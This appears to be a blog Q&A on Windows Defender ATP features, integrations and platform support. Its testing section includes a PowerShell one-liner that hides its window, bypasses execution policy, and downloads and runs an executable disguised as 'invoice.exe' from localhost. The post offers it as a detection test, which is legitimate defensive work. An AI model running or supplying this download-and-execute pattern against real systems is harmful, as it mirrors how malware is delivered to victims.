SharePoint Stuff



Windows Defender Advanced Threat Protection (WDATP) Q&A

Written by Luke Smith. Posted in Microsoft

Q:Can you configure Defender ATP to use additional or different security threat feeds such as: FireEye, LookingGlass, Infoblox, SecureWorks, RSA, McAfee, Customer prebuilt feed)
A: TBC
Q: Are you able to block particular MD5\applications
A: You can create custom IOC’s and TI;s using API or PS (https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/threat-indicator-concepts-windows-defender-advanced-threat-protection)
Q Can you define automatic custom isolation and block rules (based on MD5 and application names)
A: TBC
Q: Can you Change the ratings of the existing threat categories?
A: Only for the custom Indicators of Compromise IOC’s or Threat Intelligence TI’s
Q:Can you Integrate with other SIEMs\SOCs
A: Currently only HP and splunk
Q: Can Defender ATP Integrate with third-party CMDBs
A: AD using AD connect – TBc for third-parties such as SCCM\LANDesk
Q: Can Windows Defender ATP integrate with Office ATP
A: Yes, WDATP and O365ATP can be integrated and needs enabling as per the following: https://support.office.com/en-us/article/Office-365-Threat-Intelligence-overview-32405DA5-BEE1-4A4B-82E5-8399DF94C512 and https://docs.microsoft.com/en-gb/windows/threat-protection/windows-defender-atp/advanced-features-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with older versions of Windows below 8.1?
A: No, but does work with Windows Server 2012R2 and above https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/configure-server-endpoints-windows-defender-advanced-threat-protection
Q: Can Defender ATP work with non-windows based machines
A: Yes, requires Bitdefender and can run on macOS, Linux, iOS and Android: https://www.bitdefender.com/business/end-point-security-linux-mac.html (Other third-parties such as Lookout and Ziften will be added Nov 2017)
Q: Can Defender integrate with Cloud App Security?
A: TBC
Q: How can I test Defender ATP
A: see: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus:DOS/EICAR_Test_File – text file containing remove the <>
A: once configured and also run:
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://127.0.0.1/1.exe’, ‘C:\test-WDATP-test\invoice.exe’);Start-Process ‘C:\test-WDATP-test\invoice.exe’

Useful Links:
Docs.Microsoft: https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-atp/windows-defender-advanced-threat-protection
Windows Defender Advanced Threat Protection – Ransomware response playbook https://www.microsoft.com/en-us/download/confirmation.aspx?id=55090

Tags: , , ,

Trackback from your site.

Luke Smith

I’ve been working with Microsoft Technologies for over 15 years, my main focus being Windows Azure IaaS and Office 365. I Manage the Cloud Services at ClearPeople ltd and as a PTSP at Microsoft. I have worked with many organisations from SMB to EPG. I’ve been working with Microsoft Technologies since DOS 5.0, to date I have been working on Microsoft’s latest cloud technology Windows Azure, Office 365 and Microsoft SharePoint

Leave a comment